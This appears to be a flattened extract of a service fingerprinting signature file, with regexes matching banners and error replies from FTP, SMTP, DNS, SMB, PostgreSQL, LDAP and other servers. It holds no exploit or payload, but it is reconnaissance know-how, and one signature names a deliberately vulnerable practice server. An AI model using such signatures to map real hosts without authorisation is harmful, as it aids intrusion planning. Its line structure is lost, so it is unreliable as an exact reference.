packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 +\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n +220 ESMTP Service ready\r\n500 Command unrecognized\r\n +220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n +220 WebMail ESMTP\r\n502 negative vibes\r\n +220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n +220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n +220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd +220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n +220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n +220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n +220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n +220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n +220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n +220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n +220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n +220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: +220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n +220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n +220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n +220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n +503 Synchronization error\r\n +(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) +Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n +Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n +Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n +\x05\xff +\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore +AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 +\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ +\0\r\nlogin: \^W\^@\^@\^@\^ +\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 +\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 +\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) +\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager +\x16\x03\0.*Sophos EM Certification Manager +\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 +\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 +\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 +\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 +\x52\x00\x00\x00\x08\x00\x00\x00\x03 +\0\0\0\x02\0\x03 +\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 +\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 +\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 +\x83\0\0\x01\x8f +\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 +\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 +\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector +E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 +\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 +\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 +\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup +\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 +\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc +\0\0\0\x0b3999 No go\n +2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n +\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. +\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. +\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. +\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) +\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 +\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) +\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 +GIOP\x01\0\x01\x06\0\0\0\0 +\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 +RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n +\0 +default: unknown printer\n +VSE Line Printer Daemon has rejected this request\.\0\0 +no queue to check\n\0 +EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ +\x02rFactorMonitor\x000400\0 +\0\0\0\t51000000\0\0\0\0[^\0] +0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed +02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed +0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind +0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 +0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed +0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded + +TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) +\0\x04\0 +TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 +ActiveFax Server: Es befinden sich insgesamt +\x03\0\x26 +no entries\n +Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 +\x03\0\0\x0b\x06\xd0\0\0\x12.\0 +\x03\0\0\x0b\x06\xd0\0\0\x03.\0 +\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n +\x03\0\0\x0b\x06\xd0\0\x004\x12\0 +.\0\x01.....\0([^\0]+)\0 +\0\0 +\x74\x4e\x63\x50\0\0\0\x10\x33\x33 +\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 +.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 